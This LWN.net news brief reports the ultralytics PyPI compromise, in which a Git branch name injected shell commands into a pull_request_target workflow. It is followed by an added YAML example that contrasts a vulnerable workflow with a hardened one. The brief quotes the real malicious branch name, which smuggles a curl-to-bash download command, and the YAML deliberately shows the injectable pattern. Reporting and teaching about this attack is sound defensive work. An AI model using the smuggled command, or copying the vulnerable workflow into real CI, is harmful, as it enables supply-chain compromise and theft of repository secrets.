Abusing Git branch names to compromise a PyPI package
Friday December 6, 2024, 07:44 PM, from LWN.net
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account 'OpenIM Robot' (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script. This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
https://lwn.net/Articles/1001215/
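The injection pattern described above, as an added illustration that is not from the article or the ultralytics repository: a pull_request_target workflow that interpolates the head branch name straight into a run: script, beside the usual hardening (pass untrusted context through an environment variable and quote it, and keep the job's token at least privilege). The workflow, job and step names are assumptions.

```yaml
# Added illustration (not the ultralytics workflow). Both jobs are triggered by
# pull_request_target, so they run with the base repository's secrets.
name: pr-check
on:
  pull_request_target:

jobs:
  # VULNERABLE: ${{ ... }} is substituted into the script text before the shell
  # runs it, so a branch name containing $(...) is parsed as a command and
  # executed with access to this job's secrets.
  unsafe:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Checking branch ${{ github.head_ref }}"

  # HARDENED: the value reaches the shell only as an environment variable; the
  # shell expands "$HEAD_REF" as data and never re-parses it as commands.
  safe:
    runs-on: ubuntu-latest
    permissions:
      contents: read       # least privilege for the job's GITHUB_TOKEN
    steps:
      - env:
          HEAD_REF: ${{ github.head_ref }}
        run: echo "Checking branch $HEAD_REF"
```

Quoting alone does not make pull_request_target safe: any step that checks out the pull request's head and then runs its code (an install or test step) still executes contributor-controlled code with the repository's secrets, so such steps belong under the plain pull_request trigger.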